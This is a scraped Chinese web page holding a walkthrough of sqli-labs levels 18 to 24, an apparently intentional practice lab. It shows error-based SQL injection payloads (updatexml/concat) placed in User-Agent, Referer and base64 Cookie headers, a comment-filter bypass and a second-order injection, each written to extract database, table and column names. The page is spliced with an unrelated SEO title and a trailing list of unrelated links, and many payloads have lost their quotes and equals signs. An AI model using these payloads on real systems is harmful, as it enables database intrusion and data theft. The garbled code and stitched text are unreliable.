当前位置: 首页 > news >正文

使用h5做的学习网站源码企业网站建设分为那几个阶段

使用h5做的学习网站源码,企业网站建设分为那几个阶段,空间设计手法有哪些,网上做兼职老师的正规网站【less-18】 打开时#xff0c;获取了自己的IP地址。#xff0c;通过分析源码知道#xff0c;会将用户的user-agent作为参数记录到数据库中。 提交的是信息有user-Agent、IP、uname信息。 此时可以借助Burp Suite 工具#xff0c;修改user_agent#xff0c;实现sql注入。…【less-18】 打开时获取了自己的IP地址。通过分析源码知道会将用户的user-agent作为参数记录到数据库中。 提交的是信息有user-Agent、IP、uname信息。 此时可以借助Burp Suite 工具修改user_agent实现sql注入。 最后得到数据库名security。 解题步骤 //第一步获取数据库名and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- //第二步获取数据表名and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),0x7e),1),1,1) -- //第三步获取数据表字段and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameemails ),0x7e),1),1,1) -- 【less-19】 与less-18唯一的区别是提交的信息不再是user-agent而是referer。 解题步骤 //第一步获取数据库名and updatexml(1,concat(0x7e,(select database()),0x7e),1),1) -- //第二步获取数据表名and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),0x7e),1),1,1) -- //第三步获取数据表字段and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameemails ),0x7e),1),1,1) -- 【less-20】 从上图的信息可以看出登录之后记录的信息是类似的根据前两题的经验尝试使用user-agent、referr、cookie信息进行注入。 经过验证将抓包的cookie进行更改 改为 结果为 其他步骤 # 第二步获取数据表名and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),0x7e),1) -- # 第三步获取数据表字段and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameemails ),0x7e),1) -- 【less-21】 通过抓包和源码分析可以得出less-21使用的是cookie而且还是base64加密的。 和Less-20注入原理相同不同的是在修改cookie时先转成base64的值。 先将注入编码进行base64编码。 然后再把编制的码代入到cookie中。 出现错误是因为“-- ”在进行base64编码时出现了问题。 可以将“-- ” 替换为 1 1 具体代码 admin and updatexml(1,concat(0x7e,(select database(),0x7e),1) -- #改为admin and updatexml(1,concat(0x7e,(select database()),0x7e),1) and 11#对应的base64编码YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE 调试结果 其他步骤和Less-20类似区别都是要变成base64加密。 # 第二步获取数据表名 admin and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),0x7e),1) and 11# 第三步获取数据表字段 admin and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameemails ),0x7e),1) and 11【less-22】 通过分析源码得知基本Less-21相似唯一的区别就是单引号变成了双引号。 解题步骤和Less-21相同。 #第一步获取数据库admin and updatexml(1,concat(0x7e,(select database()),0x7e),1) and 11# 第二步获取数据表名 admin and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),0x7e),1) and 11# 第三步获取数据表字段 admin and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameemails ),0x7e),1) and 11结果 【less-23】 less-23是一种GET方式的注入使用之前的方式发现无法注入分析源码得知之前用的 注释-- 和# 都被替换了空。 此时尝试一种新的注释方式 1 1 以消除原本SQL语句中的引号。 解题方法 # 获取数据库名and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 11# 获取数据表名and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase()limit 0,1),0x7e),1) or 11# 获取数据字段and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameemails limit 0,1),0x7e),1) or 11 结果为 【less-24】 less24是一个二次注入的案例。 分析源码 可以看出只有用户名username没有用mysql_real_escape_string()对特殊字符进行转义。 解题步骤 1.注册admin用户 2.登录并修改admin密码 3.尝试使用admin账号和新密码登录破解管理员账号。
http://www.hkea.cn/news/14363637/

相关文章:

  • 哪些购物网站有做拼团活动没有足够的权限卸载2345网址导航
  • 怎么做淘宝客网站备案多说wordpress
  • 永顺网站建设美康优选网站怎么做的
  • 企业网站群建设的原因重庆微网站建设哪家好
  • 中江建设银行网站广州公共资源交易
  • 做一个购物网站济宁seo优化公司
  • 网站主机空间价格浏览器老是跳到购物app
  • 免费获客软件汕头seo外包
  • 都有哪些网站可以做推广网站种类有哪些
  • 外贸网站用什么空间保定百度seo公司
  • 宜昌网站建设市场邯郸做企业网站设计的公司
  • 网站二级目录 修改路径优秀设计平台
  • 企业网站备案信息网上商城什么意思
  • 外包做网站哪家好某种网站怎么找
  • 化妆品设计网站有没有免费的分销软件
  • 网站开发入门习题设计房屋立体图的软件
  • 网文封面制作网站山东城乡建设厅网站
  • 抚顺市城市建设档案馆网站seo搜索引擎优化论文
  • html5微网站wordpress 访问无样式
  • 青岛网站建设制作公司河南网站建设公司排名
  • vps架设好网站访问不了免费的购物网站源码
  • 建设银行手机银行银行下载官方网站爱站数据
  • 公司网站建设费怎么入账2018做网站开发一个月工资多少
  • 做的网站 为什么百度搜不到文字做图网站
  • 湖北系统建站怎么用百度收录提交工具
  • 广告创意设计方案龙岗网站 建设seo信科
  • 潍坊专业网站建设哪家便宜wordpress用什么主题
  • 鹤山市住房和城乡建设局网站客户端网站建设文档
  • 装修设计师网站西双版纳傣族自治州有几个县
  • 网站做代练ps如何做网站导航图